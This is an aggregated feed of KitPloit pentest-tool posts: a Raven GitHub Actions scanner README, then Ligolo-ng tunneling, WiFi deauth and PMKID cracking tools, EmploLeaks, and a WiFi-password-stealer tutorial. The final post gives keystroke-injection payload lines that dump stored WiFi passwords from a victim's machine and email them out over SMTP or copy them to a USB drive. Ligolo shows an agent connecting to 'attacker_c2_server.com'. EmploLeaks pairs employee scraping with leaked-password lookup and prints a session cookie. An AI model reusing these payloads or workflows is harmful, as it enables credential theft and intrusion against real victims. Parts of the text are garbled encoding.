raven download org --token $GITHUB_TOKEN --org-name RavenDemo

Crawl mode:

raven download crawl --token $GITHUB_TOKEN --min-stars 1000

Step 4: Run Raven Indexer

raven index

Step 5: Inspect the results through the reporter

raven report --format raw

At this point, it is possible to inspect the data in the Neo4j database, by connecting http://localhost:7474/browser/.

Prerequisites

  • Python 3.9+
  • Docker Compose v2.1.0+
  • Docker Engine v1.13.0+

Infrastructure

Raven is using two primary docker containers: Redis and Neo4j. make setup will run a docker compose command to prepare that environment.

Usage

The tool contains three main functionalities, download and index and report.

Download

Download Organization Repositories

usage: raven download org [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] --org-name ORG_NAME

options:
-h, --help show this help message and exit
--token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)
--debug Whether to print debug statements, default: False
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--org-name ORG_NAME Organization name to download the workflows

Download Public Repositories

usage: raven download crawl [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--max-stars MAX_STARS] [--min-stars MIN_STARS]

options:
-h, --help show this help message and exit
--token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)
--debug Whether to print debug statements, default: False
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--max-stars MAX_STARS
Maximum number of stars for a repository
--min-stars MIN_STARS
Minimum number of stars for a repository, default : 1000

Index

usage: raven index [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI] [--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS]
[--clean-neo4j] [--debug]

options:
-h, --help show this help message and exit
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--neo4j-uri NEO4J_URI
Neo4j URI endpoint, default: neo4j://localhost:7687
--neo4j-user NEO4J_USER
Neo4j username, default: neo4j
--neo4j-pass NEO4J_PASS
Neo4j password, default: 123456789
--clean-neo4j, -cn Whether to clean cache, and index f rom scratch, default: False
--debug Whether to print debug statements, default: False

Report

usage: raven report [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI]
[--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS] [--clean-neo4j]
[--tag {injection,unauthenticated,fixed,priv-esc,supply-chain}]
[--severity {info,low,medium,high,critical}] [--queries-path QUERIES_PATH] [--format {raw,json}]
{slack} ...

positional arguments:
{slack}
slack Send report to slack channel

options:
-h, --help show this help message and exit
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--neo4j-uri NEO4J_URI
Neo4j URI endpoint, default: neo4j://localhost:7687
--neo4j-user NEO4J_USER
Neo4j username, default: neo4j
--neo4j-pass NEO4J_PASS
Neo4j password, default: 123456789
--clean-neo4j, -cn Whether to clean cache, and index from scratch, default: False
--tag {injection,unauthenticated,fixed,priv-esc,supply-chain}, -t {injection,unauthenticated,fixed,priv-esc,supply-chain}
Filter queries with specific tag
--severity {info,low,medium,high,critical}, -s {info,low,medium,high,critical}
Filter queries by severity level (default: info)
--queries-path QUERIES_PATH, -dp QUERIES_PATH
Queries folder (default: library)
--format {raw,json}, -f {raw,json}
Report format (default: raw)

Examples

Retrieve all workflows and actions associated with the organization.

raven download org --token $GITHUB_TOKEN --org-name microsoft --org-name google --debug

Scrape all publicly accessible GitHub repositories.

raven download crawl --token $GITHUB_TOKEN --min-stars 100 --max-stars 1000 --debug

After finishing the download process or if interrupted using Ctrl+C, proceed to index all workflows and actions into the Neo4j database.

raven index --debug

Now, we can generate a report using our query library.

raven report --severity high --tag injection --tag unauthenticated

Rate Limiting

For effective rate limiting, you should supply a Github token. For authenticated users, the next rate limiting applies:

  • Code search - 30 queries per minute
  • Any other API - 5000 per hour

Research Knowledge Base

Current Limitations

  • It is possible to run external action by referencing a folder with a Dockerfile (without action.yml). Currently, this behavior isn't supported.
  • It is possible to run external action by referencing a docker container through the docker://... URL. Currently, this behavior isn't supported.
  • It is possible to run an action by referencing it locally. This creates complex behavior, as it may come from a different repository that was checked out previously. The current behavior is trying to find it in the existing repository.
  • We aren't modeling the entire workflow structure. If additional fields are needed, please submit a pull request according to the contribution guidelines.

Future Research Work

  • Implementation of taint analysis. Example use case - a user can pass a pull request title (which is controllable parameter) to an action parameter that is named data. That action parameter may be used in a run command: - run: echo ${{ inputs.data }}, which creates a path for a code execution.
  • Expand the research for findings of harmful misuse of GITHUB_ENV. This may utilize the previous taint analysis as well.
  • Research whether actions/github-script has an interesting threat landscape. If it is, it can be modeled in the graph.

Want more of CI/CD Security, AppSec, and ASPM? Check out Cycode

If you liked Raven, you would probably love our Cycode platform that offers even more enhanced capabilities for visibility, prioritization, and remediation of vulnerabilities across the software delivery.

If you are interested in a robust, research-driven Pipeline Security, Application Security, or ASPM solution, don't hesitate to get in touch with us or request a demo using the form https://cycode.com/book-a-demo/.



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Ligolo-Ng - An Advanced, Yet Simple, Tunneling/Pivoting Tool That Uses A TUN Interface

By: Zion3R β€” January 26th 2024 at 11:30


Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).


Features

  • Tun interface (No more SOCKS!)
  • Simple UI with agent selection and network information
  • Easy to use and setup
  • Automatic certificate configuration with Let's Encrypt
  • Performant (Multiplexing)
  • Does not require high privileges
  • Socket listening/binding on the agent
  • Multiple platforms supported for the agent

How is this different from Ligolo/Chisel/Meterpreter... ?

Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using Gvisor.

When running the relay/proxy server, a tun interface is used, packets sent to this interface are translated, and then transmitted to the agent remote network.

As an example, for a TCP connection:

  • SYN are translated to connect() on remote
  • SYN-ACK is sent back if connect() succeed
  • RST is sent if ECONNRESET, ECONNABORTED or ECONNREFUSED syscall are returned after connect
  • Nothing is sent if timeout

This allows running tools like nmap without the use of proxychains (simpler and faster).

Building & Usage

Precompiled binaries

Precompiled binaries (Windows/Linux/macOS) are available on the Release page.

Building Ligolo-ng

Building ligolo-ng (Go >= 1.20 is required):

$ go build -o agent cmd/agent/main.go
$ go build -o proxy cmd/proxy/main.go
# Build for Windows
$ GOOS=windows go build -o agent.exe cmd/agent/main.go
$ GOOS=windows go build -o proxy.exe cmd/proxy/main.go

Setup Ligolo-ng

Linux

When using Linux, you need to create a tun interface on the Proxy Server (C2):

$ sudo ip tuntap add user [your_username] mode tun ligolo
$ sudo ip link set ligolo up

Windows

You need to download the Wintun driver (used by WireGuard) and place the wintun.dll in the same folder as Ligolo (make sure you use the right architecture).

Running Ligolo-ng proxy server

Start the proxy server on your Command and Control (C2) server (default port 11601):

$ ./proxy -h # Help options
$ ./proxy -autocert # Automatically request LetsEncrypt certificates

TLS Options

Using Let's Encrypt Autocert

When using the -autocert option, the proxy will automatically request a certificate (using Let's Encrypt) for attacker_c2_server.com when an agent connects.

Port 80 needs to be accessible for Let's Encrypt certificate validation/retrieval

Using your own TLS certificates

If you want to use your own certificates for the proxy server, you can use the -certfile and -keyfile parameters.

Automatic self-signed certificates (NOT RECOMMENDED)

The proxy/relay can automatically generate self-signed TLS certificates using the -selfcert option.

The -ignore-cert option needs to be used with the agent.

Beware of man-in-the-middle attacks! This option should only be used in a test environment or for debugging purposes.

Using Ligolo-ng

Start the agent on your target (victim) computer (no privileges are required!):

$ ./agent -connect attacker_c2_server.com:11601

If you want to tunnel the connection over a SOCKS5 proxy, you can use the --socks ip:port option. You can specify SOCKS credentials using the --socks-user and --socks-pass arguments.

A session should appear on the proxy server.

INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"

Use the session command to select the agent.

ligolo-ng Β» session 
? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000

Display the network configuration of the agent using the ifconfig command:

[Agent : nchatelain@nworkstation] Β» ifconfig 
[...]
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚ Interface 3 β”‚
β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
β”‚ Name β”‚ wlp3s0 β”‚
β”‚ Hardware MAC β”‚ de:ad:be:ef:ca:fe β”‚
β”‚ MTU β”‚ 1500 β”‚
β”‚ Flags β”‚ up|broadcast|multicast β”‚
β”‚ IPv4 Address β”‚ 192.168.0.30/24 β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

Add a route on the proxy/relay server to the 192.168.0.0/24 agent network.

Linux:

$ sudo ip route add 192.168.0.0/24 dev ligolo

Windows:

> netsh int ipv4 show interfaces

Idx MΓ©t MTU Γ‰tat Nom
--- ---------- ---------- ------------ ---------------------------
25 5 65535 connected ligolo

> route add 192.168.0.0 mask 255.255.255.0 0.0.0.0 if [THE INTERFACE IDX]

Start the tunnel on the proxy:

[Agent : nchatelain@nworkstation] Β» start
[Agent : nchatelain@nworkstation] Β» INFO[0690] Starting tunnel to nchatelain@nworkstation

You can now access the 192.168.0.0/24 agent network from the proxy server.

$ nmap 192.168.0.0/24 -v -sV -n
[...]
$ rdesktop 192.168.0.123
[...]

Agent Binding/Listening

You can listen to ports on the agent and redirect connections to your control/proxy server.

In a ligolo session, use the listener_add command.

The following example will create a TCP listening socket on the agent (0.0.0.0:1234) and redirect connections to the 4321 port of the proxy server.

[Agent : nchatelain@nworkstation] Β» listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp
INFO[1208] Listener created on remote agent!

On the proxy:

$ nc -lvp 4321

When a connection is made on the TCP port 1234 of the agent, nc will receive the connection.

This is very useful when using reverse tcp/udp payloads.

You can view currently running listeners using the listener_list command and stop them using the listener_stop [ID] command:

[Agent : nchatelain@nworkstation] Β» listener_list 
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚ Active listeners β”‚
β”œβ”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€ ───────────────────┬─────────────────────────
β”‚ # β”‚ AGENT β”‚ AGENT LISTENER ADDRESS β”‚ PROXY REDIRECT ADDRESS β”‚
β”œβ”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€& #9508;
β”‚ 0 β”‚ nchatelain@nworkstation β”‚ 0.0.0.0:1234 β”‚ 127.0.0.1:4321 β”‚
β””β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

[Agent : nchatelain@nworkstation] Β» listener_stop 0
INFO[1505] Listener closed.

Demo

ligolo-ng_demo.mp4

Does it require Administrator/root access ?

On the agent side, no! Everything can be performed without administrative access.

However, on your relay/proxy server, you need to be able to create a tun interface.

Supported protocols/packets

  • TCP
  • UDP
  • ICMP (echo requests)

Performance

You can easily hit more than 100 Mbits/sec. Here is a test using iperf from a 200Mbits/s server to a 200Mbits/s connection.

$ iperf3 -c 10.10.0.1 -p 24483
Connecting to host 10.10.0.1, port 24483
[ 5] local 10.10.0.224 port 50654 connected to 10.10.0.1 port 24483
[ ID] Interval Transfer Bitrate Retr Cwnd
[ 5] 0.00-1.00 sec 12.5 MBytes 105 Mbits/sec 0 164 KBytes
[ 5] 1.00-2.00 sec 12.7 MBytes 107 Mbits/sec 0 263 KBytes
[ 5] 2.00-3.00 sec 12.4 MBytes 104 Mbits/sec 0 263 KBytes
[ 5] 3.00-4.00 sec 12.7 MBytes 106 Mbits/sec 0 263 KBytes
[ 5] 4.00-5.00 sec 13.1 MBytes 110 Mbits/sec 2 134 KBytes
[ 5] 5.00-6.00 sec 13.4 MBytes 113 Mbits/sec 0 147 KBytes
[ 5] 6.00-7.00 sec 12.6 MBytes 105 Mbits/sec 0 158 KBytes
[ 5] 7.00-8.00 sec 12.1 MBytes 101 Mbits/sec 0 173 KBytes
[ 5] 8. 00-9.00 sec 12.7 MBytes 106 Mbits/sec 0 182 KBytes
[ 5] 9.00-10.00 sec 12.6 MBytes 106 Mbits/sec 0 188 KBytes
- - - - - - - - - - - - - - - - - - - - - - - - -
[ ID] Interval Transfer Bitrate Retr
[ 5] 0.00-10.00 sec 127 MBytes 106 Mbits/sec 2 sender
[ 5] 0.00-10.08 sec 125 MBytes 104 Mbits/sec receiver

Caveats

Because the agent is running without privileges, it's not possible to forward raw packets. When you perform a NMAP SYN-SCAN, a TCP connect() is performed on the agent.

When using nmap, you should use --unprivileged or -PE to avoid false positives.

Todo

  • Implement other ICMP error messages (this will speed up UDP scans) ;
  • Do not RST when receiving an ACK from an invalid TCP connection (nmap will report the host as up) ;
  • Add mTLS support.

Credits

  • Nicolas Chatelain <nicolas -at- chatelain.me>


☐ β˜† βœ‡ KitPloit - PenTest Tools!

Airgorah - A WiFi Auditing Software That Can Perform Deauth Attacks And Passwords Cracking

By: Zion3R β€” January 24th 2024 at 11:30


Airgorah is a WiFi auditing software that can discover the clients connected to an access point, perform deauthentication attacks against specific clients or all the clients connected to it, capture WPA handshakes, and crack the password of the access point.

It is written in Rust and uses GTK4 for the graphical part. The software is mainly based on aircrack-ng tools suite.

⭐ Don't forget to put a star if you like the project!

Legal

Airgorah is designed to be used in testing and discovering flaws in networks you are owner of. Performing attacks on WiFi networks you are not owner of is illegal in almost all countries. I am not responsible for whatever damage you may cause by using this software.

Requirements

This software only works on linux and requires root privileges to run.

You will also need a wireless network card that supports monitor mode and packet injection.

Installation

The installation instructions are available here.

Usage

The documentation about the usage of the application is available here.

License

This project is released under MIT license.

Contributing

If you have any question about the usage of the application, do not hesitate to open a discussion

If you want to report a bug or provide a feature, do not hesitate to open an issue or submit a pull request



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Pmkidcracker - A Tool To Crack WPA2 Passphrase With PMKID Value Without Clients Or De-Authentication

By: Zion3R β€” January 15th 2024 at 11:30


This program is a tool written in Python to recover the pre-shared key of a WPA2 WiFi network without any de-authentication or requiring any clients to be on the network. It targets the weakness of certain access points advertising the PMKID value in EAPOL message 1.


Program Usage

python pmkidcracker.py -s <SSID> -ap <APMAC> -c <CLIENTMAC> -p <PMKID> -w <WORDLIST> -t <THREADS(Optional)>

NOTE: apmac, clientmac, pmkid must be a hexstring, e.g b8621f50edd9

How PMKID is Calculated

The two main formulas to obtain a PMKID are as follows:

  1. Pairwise Master Key (PMK) Calculation: passphrase + salt(ssid) => PBKDF2(HMAC-SHA1) of 4096 iterations
  2. PMKID Calculation: HMAC-SHA1[pmk + ("PMK Name" + bssid + clientmac)]

This is just for understanding, both are already implemented in find_pw_chunk and calculate_pmkid.

Obtaining the PMKID

Below are the steps to obtain the PMKID manually by inspecting the packets in WireShark.

*You may use Hcxtools or Bettercap to quickly obtain the PMKID without the below steps. The manual way is for understanding.

To obtain the PMKID manually from wireshark, put your wireless antenna in monitor mode, start capturing all packets with airodump-ng or similar tools. Then connect to the AP using an invalid password to capture the EAPOL 1 handshake message. Follow the next 3 steps to obtain the fields needed for the arguments.

Open the pcap in WireShark:

  • Filter with wlan_rsna_eapol.keydes.msgnr == 1 in WireShark to display only EAPOL message 1 packets.
  • In EAPOL 1 pkt, Expand IEEE 802.11 QoS Data Field to obtain AP MAC, Client MAC
  • In EAPOL 1 pkt, Expand 802.1 Authentication > WPA Key Data > Tag: Vendor Specific > PMKID is below

If access point is vulnerable, you should see the PMKID value like the below screenshot:

Demo Run

Disclaimer

This tool is for educational and testing purposes only. Do not use it to exploit the vulnerability on any network that you do not own or have permission to test. The authors of this script are not responsible for any misuse or damage caused by its use.



☐ β˜† βœ‡ KitPloit - PenTest Tools!

EmploLeaks - An OSINT Tool That Helps Detect Members Of A Company With Leaked Credentials

By: Zion3R β€” January 12th 2024 at 11:30

Β 

This is a tool designed for Open Source Intelligence (OSINT) purposes, which helps to gather information about employees of a company.

How it Works

The tool starts by searching through LinkedIn to obtain a list of employees of the company. Then, it looks for their social network profiles to find their personal email addresses. Finally, it uses those email addresses to search through a custom COMB database to retrieve leaked passwords. You an easily add yours and connect to through the tool.


Installation

To use this tool, you'll need to have Python 3.10 installed on your machine. Clone this repository to your local machine and install the required dependencies using pip in the cli folder:

cd cli
pip install -r requirements.txt

OSX

We know that there is a problem when installing the tool due to the psycopg2 binary. If you run into this problem, you can solve it running:

cd cli
python3 -m pip install psycopg2-binary`

Basic Usage

To use the tool, simply run the following command:

python3 cli/emploleaks.py

If everything went well during the installation, you will be able to start using EmploLeaks:

___________              .__         .__                 __
\_ _____/ _____ ______ | | ____ | | ____ _____ | | __ ______
| __)_ / \____ \| | / _ \| | _/ __ \__ \ | |/ / / ___/
| \ Y Y \ |_> > |_( <_> ) |_\ ___/ / __ \| < \___ \
/_______ /__|_| / __/|____/\____/|____/\___ >____ /__|_ \/____ >
\/ \/|__| \/ \/ \/ \/

OSINT tool Γ°ΕΈβ€’Β΅ to chain multiple apis
emploleaks>

Right now, the tool supports two functionalities:

  • Linkedin, for searching all employees from a company and get their personal emails.
    • A GitLab extension, which is capable of finding personal code repositories from the employees.
  • If defined and connected, when the tool is gathering employees profiles, a search to a COMB database will be made in order to retrieve leaked passwords.

Retrieving Linkedin Profiles

First, you must set the plugin to use, which in this case is linkedin. After, you should set your authentication tokens and the run the impersonate process:

emploleaks> use --plugin linkedin
emploleaks(linkedin)> setopt JSESSIONID
JSESSIONID:
[+] Updating value successfull
emploleaks(linkedin)> setopt li-at
li-at:
[+] Updating value successfull
emploleaks(linkedin)> show options
Module options:

Name Current Setting Required Description
---------- ----------------------------------- ---------- -----------------------------------
hide yes no hide the JSESSIONID field
JSESSIONID ************************** no active cookie session in browser #1
li-at AQEDAQ74B0YEUS-_AAABilIFFBsAAAGKdhG no active cookie session in browser #1
YG00AxGP34jz1bRrgAcxkXm9RPNeYIAXz3M
cycrQm5FB6lJ-Tezn8GGAsnl_GRpEANRdPI
lWTRJJGF9vbv5yZHKOeze_WCHoOpe4ylvET
kyCyfN58SNNH
emploleaks(linkedin)> run i mpersonate
[+] Using cookies from the browser
Setting for first time JSESSIONID
Setting for first time li_at

li_at and JSESSIONID are the authentication cookies of your LinkedIn session on the browser. You can use the Web Developer Tools to get it, just sign-in normally at LinkedIn and press right click and Inspect, those cookies will be in the Storage tab.

Now that the module is configured, you can run it and start gathering information from the company:

Get Linkedin accounts + Leaked Passwords

We created a custom workflow, where with the information retrieved by Linkedin, we try to match employees' personal emails to potential leaked passwords. In this case, you can connect to a database (in our case we have a custom indexed COMB database) using the connect command, as it is shown below:

emploleaks(linkedin)> connect --user myuser --passwd mypass123 --dbname mydbname --host 1.2.3.4
[+] Connecting to the Leak Database...
[*] version: PostgreSQL 12.15

Once it's connected, you can run the workflow. With all the users gathered, the tool will try to search in the database if a leaked credential is affecting someone:

As a conclusion, the tool will generate a console output with the following information:
  • A list of employees of the company (obtained from LinkedIn)
  • The social network profiles associated with each employee (obtained from email address)
  • A list of leaked passwords associated with each email address.

How to build the indexed COMB database

An imortant aspect of this project is the use of the indexed COMB database, to build your version you need to download the torrent first. Be careful, because the files and the indexed version downloaded requires, at least, 400 GB of disk space available.

Once the torrent has been completelly downloaded you will get a file folder as following:

Ò”œÒ”€Ò”€ count_total.sh
Ò”œÒ”€Ò”€ data
Γ’β€β€š Ò”œÒ”€Ò”€ 0
Γ’β€β€š Ò”œÒ”€Ò”€ 1
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ 0
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ 1
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ 2
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ 3
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ 4
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò&€ 5
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ 6
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ 7
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ 8
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ 9
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ a
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ b
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ c
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ d
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ e
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ f
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ g
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ h
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ i
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ j
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ k
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ l
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ m
Γ’β€β€š Γ’β€β€š Ò”œÒ €Ò”€ n
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ o
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ p
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ q
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ r
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ s
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ symbols
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ t

At this point, you could import all those files with the command create_db:

The importer takes a lot of time for that reason we recommend to run it with patience.

Next Steps

We are integrating other public sites and applications that may offer about a leaked credential. We may not be able to see the plaintext password, but it will give an insight if the user has any compromised credential:

  • Integration with Have I Been Pwned?
  • Integration with Firefox Monitor
  • Integration with Leak Check
  • Integration with BreachAlarm

Also, we will be focusing on gathering even more information from public sources of every employee. Do you have any idea in mind? Don't hesitate to reach us:

Or you con DM at @pastacls or @gaaabifranco on Twitter.



☐ β˜† βœ‡ KitPloit - PenTest Tools!

WiFi-password-stealer - Simple Windows And Linux Keystroke Injection Tool That Exfiltrates Stored WiFi Data (SSID And Password)

By: Zion3R β€” January 2nd 2024 at 11:30


Have you ever watched a film where a hacker would plug-in, seemingly ordinary, USB drive into a victim's computer and steal data from it? - A proper wet dream for some.

Disclaimer: All content in this project is intended for security research purpose only.

Β 

Introduction

During the summer of 2022, I decided to do exactly that, to build a device that will allow me to steal data from a victim's computer. So, how does one deploy malware and exfiltrate data? In the following text I will explain all of the necessary steps, theory and nuances when it comes to building your own keystroke injection tool. While this project/tutorial focuses on WiFi passwords, payload code could easily be altered to do something more nefarious. You are only limited by your imagination (and your technical skills).

Setup

After creating pico-ducky, you only need to copy the modified payload (adjusted for your SMTP details for Windows exploit and/or adjusted for the Linux password and a USB drive name) to the RPi Pico.

Prerequisites

  • Physical access to victim's computer.

  • Unlocked victim's computer.

  • Victim's computer has to have an internet access in order to send the stolen data using SMTP for the exfiltration over a network medium.

  • Knowledge of victim's computer password for the Linux exploit.

Requirements - What you'll need


  • Raspberry Pi Pico (RPi Pico)
  • Micro USB to USB Cable
  • Jumper Wire (optional)
  • pico-ducky - Transformed RPi Pico into a USB Rubber Ducky
  • USB flash drive (for the exploit over physical medium only)


Note:

  • It is possible to build this tool using Rubber Ducky, but keep in mind that RPi Pico costs about $4.00 and the Rubber Ducky costs $80.00.

  • However, while pico-ducky is a good and budget-friedly solution, Rubber Ducky does offer things like stealthiness and usage of the lastest DuckyScript version.

  • In order to use Ducky Script to write the payload on your RPi Pico you first need to convert it to a pico-ducky. Follow these simple steps in order to create pico-ducky.

Keystroke injection tool

Keystroke injection tool, once connected to a host machine, executes malicious commands by running code that mimics keystrokes entered by a user. While it looks like a USB drive, it acts like a keyboard that types in a preprogrammed payload. Tools like Rubber Ducky can type over 1,000 words per minute. Once created, anyone with physical access can deploy this payload with ease.

Keystroke injection

The payload uses STRING command processes keystroke for injection. It accepts one or more alphanumeric/punctuation characters and will type the remainder of the line exactly as-is into the target machine. The ENTER/SPACE will simulate a press of keyboard keys.

Delays

We use DELAY command to temporarily pause execution of the payload. This is useful when a payload needs to wait for an element such as a Command Line to load. Delay is useful when used at the very beginning when a new USB device is connected to a targeted computer. Initially, the computer must complete a set of actions before it can begin accepting input commands. In the case of HIDs setup time is very short. In most cases, it takes a fraction of a second, because the drivers are built-in. However, in some instances, a slower PC may take longer to recognize the pico-ducky. The general advice is to adjust the delay time according to your target.

Exfiltration

Data exfiltration is an unauthorized transfer of data from a computer/device. Once the data is collected, adversary can package it to avoid detection while sending data over the network, using encryption or compression. Two most common way of exfiltration are:

  • Exfiltration over the network medium.
    • This approach was used for the Windows exploit. The whole payload can be seen here.

  • Exfiltration over a physical medium.
    • This approach was used for the Linux exploit. The whole payload can be seen here.

Windows exploit

In order to use the Windows payload (payload1.dd), you don't need to connect any jumper wire between pins.

Sending stolen data over email

Once passwords have been exported to the .txt file, payload will send the data to the appointed email using Yahoo SMTP. For more detailed instructions visit a following link. Also, the payload template needs to be updated with your SMTP information, meaning that you need to update RECEIVER_EMAIL, SENDER_EMAIL and yours email PASSWORD. In addition, you could also update the body and the subject of the email.

STRING Send-MailMessage -To 'RECEIVER_EMAIL' -from 'SENDER_EMAIL' -Subject "Stolen data from PC" -Body "Exploited data is stored in the attachment." -Attachments .\wifi_pass.txt -SmtpServer 'smtp.mail.yahoo.com' -Credential $(New-Object System.Management.Automation.PSCredential -ArgumentList 'SENDER_EMAIL', $('PASSWORD' | ConvertTo-SecureString -AsPlainText -Force)) -UseSsl -Port 587

 Note:

  • After sending data over the email, the .txt file is deleted.

  • You can also use some an SMTP from another email provider, but you should be mindful of SMTP server and port number you will write in the payload.

  • Keep in mind that some networks could be blocking usage of an unknown SMTP at the firewall.

Linux exploit

In order to use the Linux payload (payload2.dd) you need to connect a jumper wire between GND and GPIO5 in order to comply with the code in code.py on your RPi Pico. For more information about how to setup multiple payloads on your RPi Pico visit this link.

Storing stolen data to USB flash drive

Once passwords have been exported from the computer, data will be saved to the appointed USB flash drive. In order for this payload to function properly, it needs to be updated with the correct name of your USB drive, meaning you will need to replace USBSTICK with the name of your USB drive in two places.

STRING echo -e "Wireless_Network_Name Password\n--------------------- --------" > /media/$(hostname)/USBSTICK/wifi_pass.txt

STRING done >> /media/$(hostname)/USBSTICK/wifi_pass.txt

In addition, you will also need to update the Linux PASSWORD in the payload in three places. As stated above, in order for this exploit to be successful, you will need to know the victim's Linux machine password, which makes this attack less plausible.

STRING echo PASSWORD | sudo -S echo

STRING do echo -e "$(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=ssid=).*') \t\t\t\t $(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=psk=).*')"

Bash script

In order to run the wifi_passwords_print.sh script you will need to update the script with the correct name of your USB stick after which you can type in the following command in your terminal:

echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICK

where PASSWORD is your account's password and USBSTICK is the name for your USB device.

Quick overview of the payload

